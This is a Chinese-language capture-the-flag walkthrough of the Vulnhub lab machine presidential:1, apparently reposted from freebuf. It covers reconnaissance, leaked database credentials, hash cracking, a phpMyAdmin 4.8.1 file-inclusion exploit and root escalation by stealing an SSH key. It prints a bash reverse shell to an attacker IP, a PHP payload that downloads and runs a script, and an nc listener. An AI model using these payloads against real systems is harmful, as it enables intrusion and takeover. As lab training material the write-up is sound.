0x00靶机信息
靶机:presidential:1
难度:中-难
下载:https://www.vulnhub.com/entry/presidential-1,500/
0x01信息收集
靶场网段:192.168.250.0/24
Nmap扫描靶场网段,寻找目标靶机IP以及相关端口以及服务
|
1
2
|
nmap -sn 192.168.250.0/24nmap -sV -p- 192.168.250.132 |
![图片[1]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597289328.png)
IP:192.168.250.132
端口:80(http)2082(ssh)
![图片[2]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597289330.png)
打开网站,果不其然也是个静态页面,但是页面内有个邮箱,邮箱的域名我们本地改host绑定一下
![图片[3]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597289335.png)
接下来扫描目录寻找有价值的信息
|
1
|
nikto -h http://votenow.local |
打开config.php一片空白
![图片[5]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597289336.png)
使用dirsearch再扫下目录看看有没有漏扫
|
1
|
python3 dirsearch.py -u http://votenow.local -e php |
![图片[6]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597289337.png)
config.php.bak同样的一片空白,但是在源码内,有一些重要信息
![图片[7]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597289914.png)
是数据库的账号密码,但是数据库页面还没见到个影,爆破一下子域名试试
|
1
|
wfuzz |
再次去host里绑定
![图片[9]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597289978.png)
用config.php.bak里的账号密码登入
![图片[10]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597289934.png)
user表有一个账号密码加密了,使用john解密
|
1
|
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt john.txt |
0x02漏洞利用
phpmyadmin的版本为4.8.1,这个版本有本地包含漏洞
开始利用
SQL执行
|
1
|
select '<?phpphpinfo();exit;?>' |
![图片[11]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597289339.png)
然后包含session
|
1
|
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_4ribtr9diq98423tqfja79srek4ol8sj |
![图片[12]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597289340.png)
![图片[13]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597289999.png)
创建反弹文件
|
1
|
cd /var/www/html | echo 'bash -i >& /dev/tcp/192.168.250.129/1100 0>&1' > shell.s |
再执行SQL命令
|
1
|
select '<?phpsystem("wget 192.168.250.129/shell.sh; chmod +x shell.sh; bash shell.sh");exit;?>' |
![图片[14]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597289341.png)
nc开始监听
|
1
|
nc -lvv 1100 |
![图片[15]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597290017.png)
解决shell输入字母会变成双写
|
1
|
python -c 'import pty; pty.spawn("/bin/bash")' |
0x03提权
我们切换用户到admin用户,密码是Stella,之前user表解密出来的
尝试提权,sudo提权失败,根目录的notes.txt文件提示的大概意思就是让我们使用压缩的命令![图片[17]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597289342.png)
使用tars
|
1
2
3
4
|
tarS -cvf key.tar /root/.ssh/id_rsatar -xvf key.tarcd root/.sshssh -i id_rsa root@localhost -p 2082 |
![图片[18]-Vulnhub靶场presidential:1 – 作者:听闻瓜子Max-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200813/1597290028.png)
至此通关
来源:freebuf.com 2020-08-19 03:36:24 by: 听闻瓜子Max
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册